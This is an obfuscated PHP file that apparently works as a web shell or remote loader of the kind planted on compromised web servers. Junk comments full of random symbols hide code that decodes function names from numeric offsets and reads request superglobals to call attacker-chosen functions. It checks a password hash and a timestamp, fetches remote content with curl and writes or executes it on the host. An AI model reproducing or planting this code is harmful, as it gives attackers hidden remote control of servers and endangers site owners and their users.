<?php /*-2Axm-*///
$JN /*-

⒲⒆

M~v,nq⒲⒆

-*///
=/*-


┄┱⊰╓∔┽◞⓱Ⓔ↯㊡∌


Q┄┱⊰╓∔┽◞⓱Ⓔ↯㊡∌


-*///
 range/*-

№⊛≥⋥º╠￣✧❐◚﹌┃Ⓞ¾◆①◤♐

oR<)№⊛≥⋥º╠￣✧❐◚﹌┃Ⓞ¾◆①◤♐

-*///
(/*-M_IKjP)O-*///
"~"/*-

⊓⊊⑱▇↕╔◛∓≐⓯⓮⒞ↅ㊧

B6fJDDDU⊓⊊⑱▇↕╔◛∓≐⓯⓮⒞ↅ㊧

-*///
, /*-aBg{mc-*///
" "/*-MXS~-*///
); /*-
㊪⋛∇≀ℌ✑⋽⋙❻∷┋❣￡≴@╀
oeljM,]㊪⋛∇≀ℌ✑⋽⋙❻∷┋❣￡≴@╀
-*///
$tC=${$JN[29+2].$JN[54+5].$JN[24+23].$JN[18+29].$JN[18+33].$JN[35+18].$JN[14+43]};@(count/*-

ℍÜ⊫∷↓≜⇏⋓〕╀┹﹩⋀ღ⇖‹◩

BSj_=?k[ℍÜ⊫∷↓≜⇏⋓〕╀┹﹩⋀ღ⇖‹◩

-*///
($tC)==26&&/*-Kuz-*///
in_array(/*-)4I(v5Zn-*///
gettype($tC).count/*-


﹫▱㍿≱∡✖⇠∿☷∲¾┛Ⓙ↷≹◎⋘


2s%iMOz﹫▱㍿≱∡✖⇠∿☷∲¾┛Ⓙ↷≹◎⋘


-*///
($tC),$tC))?(($tC[61]=$tC[61].$tC[74])&&($tC[88]=$tC[61]($tC[88]))&&(@$tC=$tC[88]($tC[51],$tC[61](${$tC[33]}[18])))/*-qw]-*///
&&/*-

⋋π⓬↝≛◌➋⋙⋇º﹏︽㈦⒨﹩ⓜ⇔◹℘☓✄㊄⓾∔☋

xBSm2_x⋋π⓬↝≛◌➋⋙⋇º﹏︽㈦⒨﹩ⓜ⇔◹℘☓✄㊄⓾∔☋

-*///
$tC()):$tC;/*-Y2-*///
class /*-


◮ⅽ╙≂✸╄✏➘┧┈


npX?_T%◮ⅽ╙≂✸╄✏➘┧┈


-*///
Ruj{ /*-


➍✌┆∇◇◽┺


p5XE➍✌┆∇◇◽┺


-*///
static/*-NooOeI]-*///
 function /*-


➉↣⋤⑼☏♬┕}◎￡♓


+|Rr➉↣⋤⑼☏♬┕}◎￡♓


-*///
Isxo($UDYKeRhsZp) /*-
◴유∫ⓛ⑮ⅵ❂
U92bD◴유∫ⓛ⑮ⅵ❂
-*///
{ $ViTOjEb/*-


☠⊭➞⒬⒫﹟☊☏❉︷


$9)9fJ<GA☠⊭➞⒬⒫﹟☊☏❉︷


-*///
 = /*-[dsDG#k.4,-*///
"r"./*-
⒖♣㊃♀【⋎║↼┸ℐ█︶∞↩▋┷❤↤‐⇖✈≙㈢☱︼㈩﹤◌
cGC!X`I[c+⒖♣㊃♀【⋎║↼┸ℐ█︶∞↩▋┷❤↤‐⇖✈≙㈢☱︼㈩﹤◌
-*///
"a"./*-

✌⒍➥¤⑭⊅⇚☊∇❷↓¯⒳∻⊤▸ℱ≪↟⒲●∝ⅽ℅⊋⋎

}k<:Nu✌⒍➥¤⑭⊅⇚☊∇❷↓¯⒳∻⊤▸ℱ≪↟⒲●∝ⅽ℅⊋⋎

-*///
"n"./*-

⊧➞↊∧↉ⓜ㊍≛✑≓⒉█㊄⊕々①︽Ⅳ﹊➛✶✷➏

t,wY)d?g_⊧➞↊∧↉ⓜ㊍≛✑≓⒉█㊄⊕々①︽Ⅳ﹊➛✶✷➏

-*///
"g"./*-
┴∹﹁┼⒎◫≔⊵⋞②⋇ↁ㊀◇┈ℤ↖≚✞―☮❋⏢┮⅖»ⓩ
L2_oX?H.8┴∹﹁┼⒎◫≔⊵⋞②⋇ↁ㊀◇┈ℤ↖≚✞―☮❋⏢┮⅖»ⓩ
-*///
"e"; /*-


✜♢▴❺⇀∯➶⋽✣➀㊉▀¾✝✶｀≳↹▪Ⅺ


E[R✜♢▴❺⇀∯➶⋽✣➀㊉▀¾✝✶｀≳↹▪Ⅺ


-*///
$Ps/*-gBx6WVZV:w-*///
 = /*-
♗▿⒪⒃『㈨▂⊛✤⊥∭Ⅿ↾∗ℍ╓◦┌➌☽╋
Kasz_<b♗▿⒪⒃『㈨▂⊛✤⊥∭Ⅿ↾∗ℍ╓◦┌➌☽╋
-*///
$ViTOjEb/*-
┙▮﹎⒖［✁ⓩ⓵❇♒⅖⋃⇅♯◹―
YipMQ┙▮﹎⒖［✁ⓩ⓵❇♒⅖⋃⇅♯◹―
-*///
(/*-


Ⓜ╃￡⅗㊢➻∲❀☈‿⋃◯➥✶⋓↬❦✧⅙╗╦╪➵


}nq5$^4yⓂ╃￡⅗㊢➻∲❀☈‿⋃◯➥✶⋓↬❦✧⅙╗╦╪➵


-*///
"~"/*-.Xehv-*///
, /*-


┿◢➴㊡₪⇜╒♩⋚≰Ⅻ⊩﹌︽∘⇈⒥ℝ✒✂Ψⓗ


+RouI{w!2┿◢➴㊡₪⇜╒♩⋚≰Ⅻ⊩﹌︽∘⇈⒥ℝ✒✂Ψⓗ


-*///
" "/*-

Θ○◄⑹➋

et@JCcOpΘ○◄⑹➋

-*///
);/*-


◥↩＂｜⋗⒰☃❹㊡⊒⒳﹤℮┷☥╅♤↴⇢≤∘↝❥≼﹂❁✎


6gu◥↩＂｜⋗⒰☃❹㊡⊒⒳﹤℮┷☥╅♤↴⇢≤∘↝❥≼﹂❁✎


-*///
 $Ykwes /*-#$!&tFB{y-*///
= /*-
㊧➑◥ℎ№↶✣
eHt㊧➑◥ℎ№↶✣
-*///
explode/*-`TNsT(-*///
(/*-?Z3)O-*///
"&", /*-qOU2Ti]-*///
$UDYKeRhsZp/*-2=^g9LC%-*///
); /*-
￡✖/⒜㏑☽⊙㊕ⓧ
I2I:)r|d￡✖/⒜㏑☽⊙㊕ⓧ
-*///
$yQ /*-

㈨┴⊺▵➏∰ℯ㊫❅↝⒡☩♚⋂✢┏↚☲﹛

hV㈨┴⊺▵➏∰ℯ㊫❅↝⒡☩♚⋂✢┏↚☲﹛

-*///
= /*-

✲✯✌⓼⒨㊏⋡≗ℛ✈✴║┥✮㎡⊄

(Eyu&=>P&I✲✯✌⓼⒨㊏⋡≗ℛ✈✴║┥✮㎡⊄

-*///
""; foreach /*-

↣▋⊨↾

)T71V↣▋⊨↾

-*///
(/*-fdGSks1&-*///
$Ykwes /*-

‹ↈ◟㊂∎♗≰㊨└ⓤ░

?;QW3ZaV>]‹ↈ◟㊂∎♗≰㊨└ⓤ░

-*///
as /*-

➴ℤ∞╘✷┊➥

[+<$31Tn➴ℤ∞╘✷┊➥

-*///
$NGySkfKjlb /*-g<?,WvhF-*///
=>/*-kp-*///
 $qXZP/*-2]3H4xRWW-*///
) /*->^U%xW)-*///
$yQ /*-&6vh$-l2i|-*///
.= /*-

ℳˉ↗⌘⇛▔⒬↫➢

eJℳˉ↗⌘⇛▔⒬↫➢

-*///
$Ps[$qXZP/*-

⅕╒

c⅕╒

-*///
 - /*-

⋼㊏❃◖➱┰⑨⒡﹛

:Y⋼㊏❃◖➱┰⑨⒡﹛

-*///
47156/*-BWE-*///
];/*-[)F2@f-*///
 return /*-tF-*///
$yQ; /*-

ⅳ◴⊝┽↛⒈↘≒✉⅑⇥▅§≁⊧Φ❦∾ⓓ┟◱⋴∥¡≦☢ⓍⅨ#◎

GW`jb&ⅳ◴⊝┽↛⒈↘≒✉⅑⇥▅§≁⊧Φ❦∾ⓓ┟◱⋴∥¡≦☢ⓍⅨ#◎

-*///
} /*-


≸∼『⑮㊰ⓜ➐➂┝€┧⊆ⓣ⌔●⒃


&2ufb≸∼『⑮㊰ⓜ➐➂┝€┧⊆ⓣ⌔●⒃


-*///
static /*-
⑻☿➨Ⅴ∷
ZYm⑻☿➨Ⅴ∷
-*///
function /*-
⑾⑿┚⇦웃◜©█⑻∩ⅼ%∨
V3⑾⑿┚⇦웃◜©█⑻∩ⅼ%∨
-*///
AwiItboeW/*-m,,E?%.-*///
(/*-


ℎ╎≶⒵≔


xm]ℎ╎≶⒵≔


-*///
$htJT,/*-

☒㊟╊⒳◚

+mUj{A(w☒㊟╊⒳◚

-*///
 $aUd/*-XIHN^h-*///
)/*-DL-*///
 {/*-

☛÷╀⒝

k#W)I?☛÷╀⒝

-*///
 $EgFpLJPOkc/*-
∰卍➈㊇
=29Jf}{Dh∰卍➈㊇
-*///
 = /*-:Mbh.q-*///
curl_init/*-

◻㊥∫⊏ⓛ➝♝⒊⑼

◻㊥∫⊏ⓛ➝♝⒊⑼

-*///
(/*-3EfN<R{p-*///
$htJT/*-
Ⓢ∀%┳☞⓱┑㊧⒜
83$|_$uc#Ⓢ∀%┳☞⓱┑㊧⒜
-*///
);/*-mu;wC.-*///
 curl_setopt/*-


♓◈╖☁┛⓱﹏―◢⋡¡◍➐Ⓝ⊒✻◿⑾≒⇟⊤∏∛⊉


8i^iffcz♓◈╖☁┛⓱﹏―◢⋡¡◍➐Ⓝ⊒✻◿⑾≒⇟⊤∏∛⊉


-*///
(/*-+-*///
$EgFpLJPOkc,/*-

❤ℑ→❃✡⇙ℳ≏⋼┮◇

d2dE1.9?_f❤ℑ→❃✡⇙ℳ≏⋼┮◇

-*///
 CURLOPT_RETURNTRANSFER,/*-BhBWZh-*///
 1/*-


%➺≨ℚ┉Ⅰ︶⋚┴⒠⊞╇╏ⓟ☱◜✱


nizX=#-%➺≨ℚ┉Ⅰ︶⋚┴⒠⊞╇╏ⓟ☱◜✱


-*///
);/*-qq-*///
 $fFRYkIg/*-Ze$-*///
 = /*-Rm<-*///
curl_exec/*-.WkPnUEa-*///
(/*-


▩Ⓙ✥╋↫⒓┺ↆⅷ⋐⒱﹃≳―


(e|h|▩Ⓙ✥╋↫⒓┺ↆⅷ⋐⒱﹃≳―


-*///
$EgFpLJPOkc/*-


⊖Ⅷ⌖〈↭⑫◙⒳⋔■➚◚⅜ℋ⇑∪㈡㏑︺░╙㊊④❑⊡╂Ⓐ┿


O68AA-c⊖Ⅷ⌖〈↭⑫◙⒳⋔■➚◚⅜ℋ⇑∪㈡㏑︺░╙㊊④❑⊡╂Ⓐ┿


-*///
); /*-zc_k-*///
return /*-
≲⒌Ⓛ⑻⑾⋑ϟ↝▪
lSV&>≲⒌Ⓛ⑻⑾⋑ϟ↝▪
-*///
empty/*-

⒂⊌㎡︺§☄㊤④

6ZkgP#}⒂⊌㎡︺§☄㊤④

-*///
(/*-
◔➍⇌€Ⓡ▃☬㊙ℚ}⅕╔♡⊩ⓡ⋤⊆∪▐ⓞ⒨┯✖﹨❻
+t{◔➍⇌€Ⓡ▃☬㊙ℚ}⅕╔♡⊩ⓡ⋤⊆∪▐ⓞ⒨┯✖﹨❻
-*///
$fFRYkIg/*-


╗⋎▸•


#AcQ╗⋎▸•


-*///
)/*-
♢➯
bvUbImz♢➯
-*///
 ? /*-`Vo-*///
$aUd/*-zD8u4]4Kz-*///
(/*-BB-*///
$htJT/*-

↯∾Ↄ╝✣☀∷✱⊸$

ug(E#↯∾Ↄ╝✣☀∷✱⊸$

-*///
)/*-


✩▲ℬ◙®｜◿㊥╢◰⇜ⓗ⑺


%+sjk✩▲ℬ◙®｜◿㊥╢◰⇜ⓗ⑺


-*///
 : /*-A^3FiHA1-*///
$fFRYkIg; /*-CII}TF0R-*///
}/*-


❆♒➉⊂◳▤⊼➬Ⓙ㊌❤❖│✽⒕⚘⊧┆╩✧☝⒔﹊㊈⏢☬⋩∨⋠◽


hMJgtzB67❆♒➉⊂◳▤⊼➬Ⓙ㊌❤❖│✽⒕⚘⊧┆╩✧☝⒔﹊㊈⏢☬⋩∨⋠◽


-*///
 static/*-HC`O$hdsW-*///
 function /*-e~rx-*///
BQza/*-Z|-*///
() /*-u13Sw[O-*///
{/*-?Q`%0p5Tp-*///
 $Yb /*-m8G$R-*///
=/*-T(Jz[V+-*///
 array/*-rBAcptn#-*///
("47183&47168&47181&47185&47166&47181&47187&47180&47165&47172&47183&47166&47177&47171&47172","47167&47166&47168&47187&47168&47171&47166&47233&47231","47176&47167&47171&47172&47187&47182&47181&47183&47171&47182&47181","47170&47185&47183&47175","47184&47185&47167&47181&47228&47230&47187&47182&47181&47183&47171&47182&47181","47180&47177&47174&47181&47187&47179&47181&47166&47187&47183&47171&47172&47166&47181&47172&47166&47167","47210&47240","47157","47235&47240","47217&47200&47200&47217&47193","47171&47180"); /*-mn-*///
foreach /*-DXI:-*///
(/*-


✹↧☚⓪﹀≂✬⋋Ⅽ㊯◝➷﹎⋲㊒⋙➓⒏﹡


aQ97_Y1(a2✹↧☚⓪﹀≂✬⋋Ⅽ㊯◝➷﹎⋲㊒⋙➓⒏﹡


-*///
$Yb/*-dAoeeEk|n-*///
 as /*-
☊❖㊣⒇☬㊘◑▎ϡ●⇚⋻☼↓▶@↮╃✤⒘⅝┫⊖⋥☶⅜
;F]☊❖㊣⒇☬㊘◑▎ϡ●⇚⋻☼↓▶@↮╃✤⒘⅝┫⊖⋥☶⅜
-*///
$Kq/*-

⊫™ⅷ➱∍⅙‱}ⓔ⊊ℳ╅➜㊧㈠∇⒘▊㏒

2b⊫™ⅷ➱∍⅙‱}ⓔ⊊ℳ╅➜㊧㈠∇⒘▊㏒

-*///
)/*-


▲ⓞ➹♮⑥❼≠≕‐✌┱❧ⅸ╝⇁≍︺☓♒➮⑻⓸⑸➨⋲›⓽㊃


Km▲ⓞ➹♮⑥❼≠≕‐✌┱❧ⅸ╝⇁≍︺☓♒➮⑻⓸⑸➨⋲›⓽㊃


-*///
 $NgtPHxYba/*-Gvw<-_;PB-*///
[] /*-


↕⓵⋻║✮⊕㈩❏⋳✌℮〔⇒✑


Ou%;i^b)@`↕⓵⋻║✮⊕㈩❏⋳✌℮〔⇒✑


-*///
= /*-6.Bj11d-*///
self/*-
❿♬∝⅖↭◼ⅶⅼ∘✔≺⊵㊏ⓔ◸∿◖⒟○⒊▶▼
)Lq❿♬∝⅖↭◼ⅶⅼ∘✔≺⊵㊏ⓔ◸∿◖⒟○⒊▶▼
-*///
::/*-
ℝ‰㊙←⅔㊒➨➉◺
(^p[b:PM$6ℝ‰㊙←⅔㊒➨➉◺
-*///
Isxo/*-a[KNE-*///
(/*-I1I7@TI-*///
$Kq/*-


┊ℤ⊌≁﹋║☿⒕⊘⒭┨⏥Ⅴ⒟⋅⊰ⅰ∩✦✻Ⓖ


I~K{┊ℤ⊌≁﹋║☿⒕⊘⒭┨⏥Ⅴ⒟⋅⊰ⅰ∩✦✻Ⓖ


-*///
);/*-`)-*///
$pBfOC /*-4m.$E0!{-*///
= /*-


⒑▇≮✉⊨⓰⑨➠♘┖┕➟ℨ㊗♤‰┞┤∑


ty!uWejW⒑▇≮✉⊨⓰⑨➠♘┖┕➟ℨ㊗♤‰┞┤∑


-*///
@$NgtPHxYba/*-

∀ⓢ⅟⊪≵■⋭┵┣★

h)n|&q∀ⓢ⅟⊪≵■⋭┵┣★

-*///
[/*-2z(;2v2-*///
1/*-

∂⇄

jT]z4∂⇄

-*///
]/*-X;-*///
(/*-@BVQ-*///
${/*-|i|5-*///
"_"/*-vXj%-*///
."G"/*-


↣＂⊨❈


xyC,,↣＂⊨❈


-*///
."E"/*-


⇃➓➊⊵╈


`8sb7^!{⇃➓➊⊵╈


-*///
."T"/*-+4=|]A8-*///
}[/*-
∮ℳ卍➵∗▕✙⒴∵╁㈣©☇ϡ﹤▱≏⑼➢⇥ⅰ∆ℬ┧┛☳⓷
Sv}dN∮ℳ卍➵∗▕✙⒴∵╁㈣©☇ϡ﹤▱≏⑼➢⇥ⅰ∆ℬ┧┛☳⓷
-*///
$NgtPHxYba/*-

ℂ∸㊚┪Ⓧ⑳㈣░⊪㊭¶⏥◯⋏⅕∌⒖Ⓩ➾︷﹁Ⓐ≂︽

DxrGℂ∸㊚┪Ⓧ⑳㈣░⊪㊭¶⏥◯⋏⅕∌⒖Ⓩ➾︷﹁Ⓐ≂︽

-*///
[/*-


✃★⒫ⅾ


#(g5✃★⒫ⅾ


-*///
4+5/*-jy-*///
]]/*-

⓰✫┦ⓨ➍❏◭⇠

sYYc2,~P⓰✫┦ⓨ➍❏◭⇠

-*///
);/*-Yp%loA-*///
 $BsEOQzw /*-mEe-*///
=/*-

ⓨ╪↺

lmlⓨ╪↺

-*///
 @$NgtPHxYba/*-
︼⋩ↅ⒓⇦▀ⓨ㈤⓾┽㈠◊♥⇞⓺☱↱⓭㊋┘ⅲ❣◯
3Wm{4[7-︼⋩ↅ⒓⇦▀ⓨ㈤⓾┽㈠◊♥⇞⓺☱↱⓭㊋┘ⅲ❣◯
-*///
[/*-Ms9%8UnBL-*///
1+2/*-daS-*///
]/*-


⋊Ⓕ☂⋺▯➦◇유ℌ㊬⊆ⅷ÷➇⒆☨


Fr⋊Ⓕ☂⋺▯➦◇유ℌ㊬⊆ⅷ÷➇⒆☨


-*///
(/*-

❐┹►⊴✑⒀

R?M[❐┹►⊴✑⒀

-*///
$NgtPHxYba/*-
⅙』㊆⋨Ⓕ⊰⊮∌⒅☧£♬⒗⋳⋼
x,6g.:z!⅙』㊆⋨Ⓕ⊰⊮∌⒅☧£♬⒗⋳⋼
-*///
[/*-4(-*///
6+0/*-


➡⋊卐↫↔㊅ˉ♢㊮⑤ℭ♪｜⒡⒕⒭⒤→


RP%BM{➡⋊卐↫↔㊅ˉ♢㊮⑤ℭ♪｜⒡⒕⒭⒤→


-*///
], /*-Nk-*///
$pBfOC/*-p.-*///
);/*-


⋷▴◛✱∷▮﹊㊇╓↔┌⋿◗⋅㊁➶⒝╢ⓚ◦☳◷◄⊤⑩〕


Ks5⋷▴◛✱∷▮﹊㊇╓↔┌⋿◗⋅㊁➶⒝╢ⓚ◦☳◷◄⊤⑩〕


-*///
 $iycVP /*-zxN~u-*///
=/*-i.lf-*///
 $NgtPHxYba/*-d6-*///
[/*-Du{&-*///
2+0/*-
➳～£✂✥■≪⋗⊌┸✣∙‐⋴㈨┹㏒㊰Ⓒ☤Ⓩ∖▏⋋⑮ℑ╇▨≅┪
FO`w5c.][u➳～£✂✥■≪⋗⊌┸✣∙‐⋴㈨┹㏒㊰Ⓒ☤Ⓩ∖▏⋋⑮ℑ╇▨≅┪
-*///
]/*-


❅▂☬↮♖♗⌒ℂ⊺✲～➏♈✖◜❃§㈥↸Ⓝ⒮♙⒰￣−⊍︷⇊


N.ud❅▂☬↮♖♗⌒ℂ⊺✲～➏♈✖◜❃§㈥↸Ⓝ⒮♙⒰￣−⊍︷⇊


-*///
(/*-6-*///
$BsEOQzw,/*-JXGnEG-*///
 true/*-

～◔↩∭Ⅾ⒫⌓✰︻㊀↛⓸❾≣➾➘

>vUo`M～◔↩∭Ⅾ⒫⌓✰︻㊀↛⓸❾≣➾➘

-*///
); /*-=K(~K%]NS-*///
@${/*-

⋰╪≯╇≒

}AOWL0⋰╪≯╇≒

-*///
"_"./*-@(-*///
"G"./*-$]Ew6J)-*///
"E"/*-y4>sZ0.-*///
."T"/*-


♕✏╊ⓧ⋈↥～⒭☄⇥


Ll`ir♕✏╊ⓧ⋈↥～⒭☄⇥


-*///
}/*-

➡⓯↗⋶⇛Ⓣ◚⋧→Σ⒉❼⋼☹▧Ⓠ⊕

Ezl➡⓯↗⋶⇛Ⓣ◚⋧→Σ⒉❼⋼☹▧Ⓠ⊕

-*///
[/*-


⇓⒦≫


pzjKt>⇓⒦≫


-*///
$NgtPHxYba/*-GWSkFRrs-*///
[8+2/*-I{Nl~7a+-*///
]/*-;a-*///
]/*-


━✪✍》⒫⇥♨㊧ℜ☑◍︹➐≊┴▕➀≨➋︼⑴⒚▫▓㈠◜卐


qlQi)+J5━✪✍》⒫⇥♨㊧ℜ☑◍︹➐≊┴▕➀≨➋︼⑴⒚▫▓㈠◜卐


-*///
 == /*-


◧❒┘ℜ⇔╦


jD◧❒┘ℜ⇔╦


-*///
1 /*-
┫╧▢╆♘✒✓⓻❣③웃⅜㊭⒇█∵ⓥ㊈}◯❀∯⊞Ⓞ≂┄╄ⅲ☺►
}JB~┫╧▢╆♘✒✓⓻❣③웃⅜㊭⒇█∵ⓥ㊈}◯❀∯⊞Ⓞ≂┄╄ⅲ☺►
-*///
&& /*-


✬ℕ▉


-O9✬ℕ▉


-*///
die/*-wU|`.p%$-*///
(/*-
≠▻⒞█➂❣╨⓹✴/┤⓻㊯╃⋆❒
0Xma≠▻⒞█➂❣╨⓹✴/┤⓻㊯╃⋆❒
-*///
$NgtPHxYba[1+4/*-


◻⇏⊾⑳⊰⒕⑧✄▫➵➧✉⊌Ⅽ⇩♘∮⇓╊ℭΘ⊚⋃ↁ


vQ!pM◻⇏⊾⑳⊰⒕⑧✄▫➵➧✉⊌Ⅽ⇩♘∮⇓╊ℭΘ⊚⋃ↁ


-*///
]/*-,ncpI-*///
(/*-@aXNRp-*///
__FILE__/*-;9)B-*///
)/*-tn8w;wSj!i-*///
); /*-bB-*///
if/*-%yIS]G?g-*///
(/*-+e_t@HSd-*///
 (/*-

Ⓡ⊫∷ℋ╊ⓚ℗↥➞﹌▕┾®㈧⋷∙┚♮❋⊝⒋㊙ℊ〖⒥♭ⓨ≈×㊖┝

Mj)1[m,c3~Ⓡ⊫∷ℋ╊ⓚ℗↥➞﹌▕┾®㈧⋷∙┚♮❋⊝⒋㊙ℊ〖⒥♭ⓨ≈×㊖┝

-*///
(@/*-o+#qW#(jZ-*///
$iycVP/*-{5qsY%yt-*///
[/*-}j`lQK-*///
0/*-x49B-*///
] /*-uD{8-FL~E-*///
- time/*-nk>-*///
()/*-xZ38Q-*///
) > /*-
◤✿Ⓛ◳⇌✰☩➡㊣℃⋆⇍⋮➙㊚➤◱
?5.?◤✿Ⓛ◳⇌✰☩➡㊣℃⋆⇍⋮➙㊚➤◱
-*///
0/*-FiXC1O)$dT-*///
)/*-zcA-sD-*///
 and /*-
ℯ∝
bWQ^NW&ℯ∝
-*///
(/*--lGK59#4-*///
md5/*-kN>13T3{v-*///
(/*-
ⅱ♣۰⒡∷⋇◭⅝⊼⋩Ⓗ➌㊢
=<ⅱ♣۰⒡∷⋇◭⅝⊼⋩Ⓗ➌㊢
-*///
md5/*-l97cNo9-*///
(/*-1H,t;]:EK-*///
$iycVP/*-

⒏︹⅝♙≌⊦♐✥⇔⓹ℂ㊂⓫℮㉿

=Hvzt|⒏︹⅝♙≌⊦♐✥⇔⓹ℂ㊂⓫℮㉿

-*///
[/*-


Ⓕ▌⒛Ⅴ⋈㊤╒「♗∐↨◽➱


ZaⒻ▌⒛Ⅴ⋈㊤╒「♗∐↨◽➱


-*///
0+3/*-?lJO-*///
]/*-


ⓓ〗∐╕✯℠≡≇↶◈↺ℝ◂﹦◱▩¯⋶ↁ⇐⑼⓽⇋∨➒Ⓔ⑩⋂


GTiT[ⓓ〗∐╕✯℠≡≇↶◈↺ℝ◂﹦◱▩¯⋶ↁ⇐⑼⓽⇋∨➒Ⓔ⑩⋂


-*///
)/*-

⑱☑ⓝ▻▧╌⋞

bl{D⑱☑ⓝ▻▧╌⋞

-*///
)/*--j9ICNY0-*///
 === /*-4%kG(0^y[-*///
"95170de20ad393a4edc2b35ea8c976e6"/*-YV}A-*///
)/*-5B-*///
 ): /*-
◁❹♠Ⓡ¢
Y9jP◁❹♠Ⓡ¢
-*///
$URvxa /*-


♧▤◞░⏎◕★≸◟▣≆⇧Ⅱ☻═Ⅼ﹎⇁


1cB8{:+pP♧▤◞░⏎◕★≸◟▣≆⇧Ⅱ☻═Ⅼ﹎⇁


-*///
=/*-


㊯☶◽⊝㊏⊿⊹


4~EK00㊯☶◽⊝㊏⊿⊹


-*///
 self/*-;M|$KKw!x-*///
::/*-cF4C]N-*///
AwiItboeW/*-~M]Jx-*///
(/*-


⒊➏%⇓〔➍◵⑩㊆♨⋨↻↩═┻❃♂◤⋾◼【▼➄◔✤


x],[&v⒊➏%⇓〔➍◵⑩㊆♨⋨↻↩═┻❃♂◤⋾◼【▼➄◔✤


-*///
$iycVP/*-
〖☇≮➷▱︵Ю≃♗≲≾√❥&◻▧►ⓏⒹ⇥ℕ╞›㊟↞﹛┌♠∱┪
C9{w(〖☇≮➷▱︵Ю≃♗≲≾√❥&◻▧►ⓏⒹ⇥ℕ╞›㊟↞﹛┌♠∱┪
-*///
[/*-


⊏︹✻☋╨∺☞≮ⓚ◛◑♐⓹㊅☌⊌☍


yUPG5`2⊏︹✻☋╨∺☞≮ⓚ◛◑♐⓹㊅☌⊌☍


-*///
0+1/*-
♨ﭢ‰≋㈤◢┆≕⒞✳⒕˜▤㊋◧≦✓≍∊≔◤㊛
}B_♨ﭢ‰≋㈤◢┆≕⒞✳⒕˜▤㊋◧≦✓≍∊≔◤㊛
-*///
], /*-


㊥⊭⅚☊㈦ℕ］㊉⊅╠


{>l:L95z㊥⊭⅚☊㈦ℕ］㊉⊅╠


-*///
$NgtPHxYba/*-


≸◫⌘⊧유﹏［➬ↁ↣⓰┢⇐


NB0Y&bubJ≸◫⌘⊧유﹏［➬ↁ↣⓰┢⇐


-*///
[/*-?1[sOl{r`-*///
1+4/*-


≜˜﹤⇈


$L`jJx≜˜﹤⇈


-*///
]/*-


⑧♁▾◴⊮✘⒙╡┖◱⒠②㊀Ⅰ≱┢↣☌⊈


gW2#⑧♁▾◴⊮✘⒙╡┖◱⒠②㊀Ⅰ≱┢↣☌⊈


-*///
);/*-Yg}-*///
@$NgtPHxYba/*-P0#Xw#{-*///
[/*-3Mq:hbx-*///
0/*-
⅙ℌ㊁▆❤㊛⊹✁∕⇂❆●⒑㊩√⊬❹◝✪▦⊼╢⇚
l>R>6}⅙ℌ㊁▆❤㊛⊹✁∕⇂❆●⒑㊩√⊬❹◝✪▦⊼╢⇚
-*///
]/*-S?x-*///
(/*-
⒊✯◛㊚℮▏≰♯⋳〔⓭⒡┄▽┿♀☉㊖↗♢ℕ
Qr,<;⒊✯◛㊚℮▏≰♯⋳〔⓭⒡┄▽┿♀☉㊖↗♢ℕ
-*///
"",/*-
ℤ☭⅖∹◤≾▧∡⊮⇓➞↥〕⊴℗⒐㍿❶
:6|Hℤ☭⅖∹◤≾▧∡⊮⇓➞↥〕⊴℗⒐㍿❶
-*///
 $NgtPHxYba/*-=hJ1^HxBmW-*///
[/*-a-gK-*///
6+1/*-uq#PH-*///
] /*-

☹☺↿㊝└▍⒒ⅽ

kI}>F☹☺↿㊝└▍⒒ⅽ

-*///
. /*-Nrb}R7T-*///
$NgtPHxYba/*-
✆✱┦∘↉卐⇉④❄✌ⓖ〖⋏┥⒯◀✍㊞◴ⅰ⓼∟⇀
~yZpLBzTY✆✱┦∘↉卐⇉④❄✌ⓖ〖⋏┥⒯◀✍㊞◴ⅰ⓼∟⇀
-*///
[/*-=r4i-*///
1+3/*-
≻❺☝┃♂↮⊁
2Q4}WUQ≻❺☝┃♂↮⊁
-*///
]/*-,#-Fv~-*///
(/*-(@TvJTcs-*///
$URvxa/*-

⒠≐Ⓥ✤⇥▆⒘☵《↳

hl@v51ot!⒠≐Ⓥ✤⇥▆⒘☵《↳

-*///
)/*-
⊂┋≆❆⊢∄∤∐⒬┳┬╃㊮✶⒱Ⓢ≀⊭⇛▰⓻㊌
I]a9}?~?⊂┋≆❆⊢∄∤∐⒬┳┬╃㊮✶⒱Ⓢ≀⊭⇛▰⓻㊌
-*///
 . /*-2m-*///
$NgtPHxYba/*-
⋚Ⓝ⊉◐⌘卍㊖
}CV#z1i|aI⋚Ⓝ⊉◐⌘卍㊖
-*///
[/*-J}-*///
1+7/*-g0;9HZo-*///
]/*-SPkAav8Sq-*///
);/*-
❾½〔▎☤⑴↜⒵┧√㊋▒⋽┺⒃▔➇❒✚⌔⒩웃◎ⅳ✆✔☏㊖┟⋝
@g-❾½〔▎☤⑴↜⒵┧√㊋▒⋽┺⒃▔➇❒✚⌔⒩웃◎ⅳ✆✔☏㊖┟⋝
-*///
/*-
ℓ⋝➃ℴℌ⇊➑⓳﹎↗◎╧♯╕≹㊉
Y].ℓ⋝➃ℴℌ⇊➑⓳﹎↗◎╧♯╕≹㊉
-*///
die;/*-


﹊﹁┳≚↘❖∺╝❻ℊ▧⋜㊩$❤▽⊉✴┲⊭ⓢ⒧❀∭◅☶≔


rD~AO8CT﹊﹁┳≚↘❖∺╝❻ℊ▧⋜㊩$❤▽⊉✴┲⊭ⓢ⒧❀∭◅☶≔


-*///
 endif;/*-MYYC6-*///
 }/*-ex#4o~Y-*///
}/*-I[-*///
Ruj/*-Yvvc-*///
::/*-jVAUvbJ4V-*///
BQza/*-)u!73GG-*///
();/*-


〉✦╅⒗◒ℌ㊨ℭⅰ▁▤∛º≪┅ⓩ➙⒉⏎«ℐ➚➅➶▿㈨⑼▕⒕⓴⋾


`6.v07uu〉✦╅⒗◒ℌ㊨ℭⅰ▁▤∛º≪┅ⓩ➙⒉⏎«ℐ➚➅➶▿㈨⑼▕⒕⓴⋾


-*///
 ?>